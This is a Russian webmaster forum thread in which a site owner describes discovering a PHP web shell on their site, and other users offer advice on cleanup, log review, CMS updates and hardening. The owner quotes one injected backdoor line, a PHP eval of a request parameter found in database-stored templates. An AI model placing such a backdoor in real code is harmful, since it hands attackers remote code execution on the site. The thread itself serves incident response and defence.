- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ах да, тут еще некоторое время с одного IP было очень много запросов (~7000). заметил в статистике li.ru. Как я понимаю, это связано?
Это могло быть связано, а может и не быть связано.
Вдруг вас просто досили либо брутили.
Нужно смотреть. что за запросы.
Нечего гадать на кофейной гуще
Всем большое спасибо. Буду разбираться.
Кстати есть интересный момент: судя по дате файла, шелл появился в те дни, когда мне хостер собирал новый сервер.
Время изменения и доступа к файлам в линуксе можно установить в любое значение.
Заметил что такие вещи всё чаще появляются. Тоже дам пару советов.
Любые скрипты перед использованием проверять антивирусом.
Сделать безопасные настройки в php.ini .
Сам часто находил даже в темах вордпреса.
Странно, что никаких изменений в сайт не было внесено.
ничего странного, дают выстояться...
Сначала проверить нужно ваш компьютер на вирусы, затем сменить пароль от фтп, а уже потом удалять пакость. И проверить через пару дней, не появилось ли снова.
Не нужно глупостей писать.
Вероятность что к нему это залили с помощью вирусов не больше 5-10%.
70-80% взломов - через движки сайтов.
Странно, что никаких изменений в сайт не было внесено.
Ну значит до него руки не дошли или на продажу выставят потом.
Всем большое спасибо. :) Буду надеяться, что сумею обезопасить свое хозяйство.
Я думаю, что самое главное понять, как это произошло.
Сам шелл был в папке images/uploads, единственное изменение, которое я нашел, это <?php if (isset($_REQUEST['qqq'])) eval ($_REQUEST['qqq']);?> в шаблонах страниц, которые хранятся в MySQL-базе (значит у хакера был полный доступ к базе?). Больше, вроде бы, никак изменений нет. Сравнил по-байтно все файлы на сервере с исходными. Как проверить MySQL-базу не знаю (есть бэкап месячной давности).
Проблема лишь в том, что не хватает ума и опыта воспользоваться логами. Слив из папки logs все access.log не нашел в них упоминаний с именем шелла или ip с которого пару недель назад было много запросов. Правда логи только за последнюю неделю. Кстати, какой командой можно проверить информацию по созданию файла-шелла (команда find ./ -name "*.php" -mtime -100 его не показывает)?
был, в конфиге почти все данные указаны.
он мог там лежать незаметно и месяц и пол года.
ищите заплатки/обновления движка и плагинов.
на аккаунте хостинга сайт один? если нет, то проверяйте и все остальные.